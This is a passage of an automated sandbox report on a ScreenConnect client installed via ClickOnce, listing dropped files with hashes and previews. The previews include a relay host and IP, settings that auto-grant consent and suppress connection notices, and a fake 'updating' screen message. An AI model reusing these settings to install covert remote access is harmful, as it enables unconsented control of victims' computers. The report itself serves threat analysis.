                                                                                                                                                                              Size (bytes):4428
                                                                                                                                                                              Entropy (8bit):4.371558920082183
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:96:f2ZNeV+Ww8z45uECG6Np+SygKfwn6GDVf:BJUuEX6pdqo6G
                                                                                                                                                                              MD5:248E3EB2EC30896517E7875A66E77C24
                                                                                                                                                                              SHA1:028ACF87912CD3226738EF37A0F430000D3F463B
                                                                                                                                                                              SHA-256:3DD7E5E8385AF9F65B2054F5255C72FDF18897EDD704FFAB0D565BC8CD0A2B7A
                                                                                                                                                                              SHA-512:8D53D953585A859202376FE8F0A3C000CB5A8EEFC1E12F14D27A05FF5360223FA938A200596F5A5C0C823A55DCAF033C50493C68027DF409BB429BF72A41A655
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1636
                                                                                                                                                                              Entropy (8bit):5.0848956029560135
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:JdFYZ8h9onRzgeP0A2+vSkcyMQcbEMQcuMQcVSkcf5bdTo:3FYZ8h9o9gI0A2CHMQTMQ3MQGAXTo
                                                                                                                                                                              MD5:F94D041A8128BE81C4347CAF6A3C47BF
                                                                                                                                                                              SHA1:3285F9ACF70C0E4D34F888C28BD3F693E3DF5909
                                                                                                                                                                              SHA-256:91A65BACAD5F7F70BDDC6209ED65DD5C375CEF9F3C289EAB83FD90D622ADF46B
                                                                                                                                                                              SHA-512:90199543207CAF9B4501BE7E9509DC9526DAFCD5602AAED700314763021C8F3ED06D93A31A90A34CB19D4FB7184AA7D154B197F9E535657AEB9EB872DA377A41
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="23.9.10.8817" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="23.9.10.8817" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):95520
                                                                                                                                                                              Entropy (8bit):6.505299402844754
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0g1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkg4T0HMc7Jxc:NhbNDxZGXfdHrX7rAc6myJkg4T0H/A
                                                                                                                                                                              MD5:DC615E9D8EC81CBF2E2452516373E5A0
                                                                                                                                                                              SHA1:EC83D37A4F45CAEB07B1605324D0315F959452E9
                                                                                                                                                                              SHA-256:E9AB064ED381C29A3930F75CA3E05605C6EE07F30A69C043F576A5461DE3BAFC
                                                                                                                                                                              SHA-512:82FE00447FB9785264DFB8032399ADF6D33D91D71058212D252742C9E5FD54F5A52F6BAF4FB05E95F9A4055057C60A33A7C1C642F18A6A4E045B49BE88FA5D9F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):61216
                                                                                                                                                                              Entropy (8bit):6.318400837211405
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:0Ai+pmi/djqbv8DtYQ4RE+TC3l/ibU37DIx4:0Upmi1YQb1l3X
                                                                                                                                                                              MD5:10DBA57F22A6AB4039330000570F39F8
                                                                                                                                                                              SHA1:B8B5C65A89256177DA802C4C9CBD11B013221730
                                                                                                                                                                              SHA-256:9BD8D15759F83D99EDD1F2617D59A94E1C2BB4BD7C4977958F5D5F22C5A7C469
                                                                                                                                                                              SHA-512:38230B63A4630145608F619D75CA3115C05AB0338FB57566E012DF1BD157123A670A37AE0FEA92351AB7352319A5AF29F9DB3F8BB14962F3F0DE3A4F5A5B754C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):81696
                                                                                                                                                                              Entropy (8bit):5.850192336318162
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:GxIh+Sflv4V/bBI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7xk7NxGC:Em9CukLdtkL
                                                                                                                                                                              MD5:C333D3A6EEB74E4D76C3B9E0F6BFD04C
                                                                                                                                                                              SHA1:A39E2643E8DBD2097829E0B08938726557CB8E36
                                                                                                                                                                              SHA-256:998D7A0CD6B1A837489E55E99CB992088B9FDE220A1025346A461849E1F50D22
                                                                                                                                                                              SHA-512:58CC7741EBE1AADA93FD82A3E0A571A9A1AA3E400C46E7CDDDEF876D74F4FBBCBAE4293AC556B3823E8DC977E7CE72337A16C2D48EAB0AA52B736412AE43C634
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                              Entropy (8bit):4.842791478883622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                              MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                              SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                              SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                              SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):531456
                                                                                                                                                                              Entropy (8bit):6.031735419537473
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:ZPpB0+E5A976t5puf9NTh/k4dKRYJUYg7N+earZ5Ghfn55AJ6m/JaXAQKx4kEYYo:dpq+Ezuf9N0RYJZPUI6
                                                                                                                                                                              MD5:B319407E807BE1A49E366F7F8EA7EE2A
                                                                                                                                                                              SHA1:B12197A877FB7E33B1CB5BA11B0DA5CA706581BA
                                                                                                                                                                              SHA-256:761B7E50BAA229E8AFCD9A50990D7F776DDB5ED1EA5FBB131C802E57CF918742
                                                                                                                                                                              SHA-512:DC497643790DC608DECE9C8FE7264EFEDD13724BD24C9BF28A60D848B405FDDEFB8337A60F3F32BB91518910E02C7A2AAF29FC32F86A464DFCAFA365526BDB7F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1716224
                                                                                                                                                                              Entropy (8bit):6.635479721420864
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:ZSjm7Fj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUw:Sm7JkGYYpT0+TFiH7efP
                                                                                                                                                                              MD5:29454A0CB83F28C24805E9A70E53444A
                                                                                                                                                                              SHA1:334202965B07AB69F08B16FED0EE6C7274463556
                                                                                                                                                                              SHA-256:998CC3F9AF5BD41CCF0F9BE86192BBE20CDEC08A6FF73C1199E1364195A83E14
                                                                                                                                                                              SHA-512:62790920974A2F1B018D466AE3E3B5100006A3C8013F43BDB04AF7074CFE5D992CAAEB610DE2B1B72FF0E4ACF8762DB1513A4A0CF331F9A340AE0CE53C3BE895
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):587040
                                                                                                                                                                              Entropy (8bit):6.166636022526366
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12288:npu96mzdjnwbrYQySjbs03fG+Yg2PgG7x:CpjpSjq77x
                                                                                                                                                                              MD5:5DEC65C4047DE914C78816B8663E3602
                                                                                                                                                                              SHA1:8807695EE8345E37EFEC43CBC0874277ED9B0A66
                                                                                                                                                                              SHA-256:71602F6B0B27C8B7D8AD624248E6126970939EFFDE785EC913ACE19052E9960E
                                                                                                                                                                              SHA-512:27B5DCB5B0AEADF246B91A173D06E5E8D6CF2CD19D86CA358E0A85B84CD9D8F2B26372EF34C3D427F57803D90F2E97CF59692C80C268A71865F08FC0E7CE42D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Yara Hits:
                                                                                                                                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..ient_4b14c015c87c1ad8_0017.0009_none_c7123e2bd9a688c6\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26
                                                                                                                                                                              Entropy (8bit):3.95006375643621
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:gAWY3n:qY3n
                                                                                                                                                                              MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                                                                                              SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                                                                                              SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                                                                                              SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:[ZoneTransfer]..ZoneId=3..
                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):192512
                                                                                                                                                                              Entropy (8bit):6.5759745825926155
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:NfVfH24qg0+UkqVk9kkkkkkHEkkkNikkAkkkkkkkkpkkAkKMi7stGzHqcyzdWFDm:H+a0+UkqVk9kkkkkkHEkkkNikkAkkkku
                                                                                                                                                                              MD5:6BC9611D5B6CEE698149A18D986547A8
                                                                                                                                                                              SHA1:F36AB74E4E502FDAF81E101836B94C91D80CB8EA
                                                                                                                                                                              SHA-256:17377A52EEAE11E8EE01EB629D6A60C10015AD2BB8BC9768E5C8E4B6500A15ED
                                                                                                                                                                              SHA-512:3F23670D0BA150DE19A805DB6BEB6EED8538BBAD6FBE3CC21D17D738A43CF411C679A23CEA11549E69BE0321E672F740791D40E92498AEF9D1F8650743EE85EA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                              Entropy (8bit):5.045566990880462
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENORB/vXbAa3xT:2dL9hK6E46YPtvH
                                                                                                                                                                              MD5:320927754A66AA3268EB87125434F3BB
                                                                                                                                                                              SHA1:E1D7F0CB7758B16E19BD5BD73789CD5A2A2DE85D
                                                                                                                                                                              SHA-256:7E159DD775A2FA46A78E8E79ED5E3E375EA07E7D5455695912C51AA086740F93
                                                                                                                                                                              SHA-512:7C468B3A99D568E17FE3FC148D716A6012DBAB8E9CDD24AB05DCE1B146C1C049D7797B50DE11796BDB628119D299F20AB334DE396F80F437CF4257CC15325217
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>cp3back96.site=37.221.67.19-29%2f10%2f2024%2018%3a35%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):762
                                                                                                                                                                              Entropy (8bit):4.5491067620977805
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:12:rHy2DLI4MWojmK7iV1ItfU49cAjUPDLS184c7uMUGia84c7eAi5TlO5FMDj0wca2:zHE4yY4M2xjU7w8LS038LD4TlcFq3aIA
                                                                                                                                                                              MD5:B09DFE9FEF5BDAD50AED0C5C81A7F8B8
                                                                                                                                                                              SHA1:0FE2ACB83A8D66156E3F8AFE10963C3878A9C8D4
                                                                                                                                                                              SHA-256:39A6456F828160E9F1D49DF496143A3D83401478B0B9DFD18B66D1F44628AA73
                                                                                                                                                                              SHA-512:C5709D3CB1379ACCCFF12A19CA42B3B696F2266AA94792B011ACD7658EB319C8EF6DF5019F83D8759F1E19DB9D4492582794739C185BD691D7C84493F7390BFB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.../>>..4..2...n_Q2T}........K...Z...5.......z...0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....^E.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.D.e.s.c.r.i.p.t.i.o.n.G...RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.I...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.w.....Support..Support.3Software is Updating..Do not turn off your computer...,Not enough data receiving from host computer..Support
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18414
                                                                                                                                                                              Entropy (8bit):7.8409431994154595
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:r0N78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74K:64Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4BsK
                                                                                                                                                                              MD5:1A9CE086DC257D884E31D884D8C138F1
                                                                                                                                                                              SHA1:83DE5729EB3E524986F18F5144490FD2DE9A8377
                                                                                                                                                                              SHA-256:8D0D89B5CBCBFC3C4EAC7B05EC6A4EB018388E8022D033524B6317BB53C8D56F
                                                                                                                                                                              SHA-512:8CA7783AF9C4C143178587AC0B6928D6D7E37F8B4B2176A34BB4F76415F492286736B2AE8D8E555BB3CEFC103FE816D98FA1296D6BF8DDC094F6AB0D6C85F2D1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF..../._.ks`.k.`.k.M6p-.......'.......w.......P.......\..."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..;..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r..E.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.m#x....X.rYn....R_.ds...*.*......V..x[$]..}.*..b...". ...,...
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):48951
                                                                                                                                                                              Entropy (8bit):4.764447249091755
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:jjhcIEFtl7CWQNzSB3CFLI0pDplrd5UVXWFhj39CwWLVhuK81htvrKetEpGcWITc:jjhcpFt9QNzi3CFLI0Vplrd5UVXWFhjF
                                                                                                                                                                              MD5:3E83A3AA62C5FF54ED98E27B3FBECF90
                                                                                                                                                                              SHA1:96D8927C870A74A478864240B3ACE94AD543DFB8
                                                                                                                                                                              SHA-256:2D88B97D28BE01ABCA4544C6381A4370C1A1CE05142C176742F13B44889DDF90
                                                                                                                                                                              SHA-512:EA9D05A4AA1EE5CCCC61C4F5E8994EFBA9EFFF0549B69577BEF1F2A22CCE908739124EFF1E0DB5CFDD69E077AD2D7CDB1307DE92D79673C9309EE621CB139956
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):26722
                                                                                                                                                                              Entropy (8bit):7.7401940386372345
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                                                                                                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                                                                                                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                                                                                                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                                                                                                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe
                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3379
                                                                                                                                                                              Entropy (8bit):4.771120809482083
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:low
Preview:
<configuration>
  <configSections>
    <section name="ScreenConnect.SystemSettings" type="System.Configuration.ClientSettingsSection" />
    <section name="ScreenConnect.UserInterfaceSettings" type="System.Configuration.ClientSettingsSection" />
  </configSections>
  <ScreenConnect.SystemSettings>
    <setting name="AutoConsentIfUserProcessNotRunning" serializeAs="String">
      <value>true</value>
    </setting>
    <setting name="AccessAutoConsentIfUserProcessNotRunning" serializeAs="String">
      <value>true</value>
    </setting>
    <setting name="SupportAutoConsentIfUserProcessNotRunning" serializeAs="String">
      <value>true</value>
    </setting>
    <setting name="AutoConsentToBackstage" serializeAs="String">
      <value>true</value>
    </setting>
  </ScreenConnect.SystemSettings>
  <ScreenConnect.UserInterfaceSettings>
    <setting name="AccessShowBalloonOnConnect" serializeAs="String">
      <value>false</value>
    </setting>
    <setting name="A
                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe
                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                              Entropy (8bit):5.045566990880462
                                                                                                                                                                              Encrypted:false
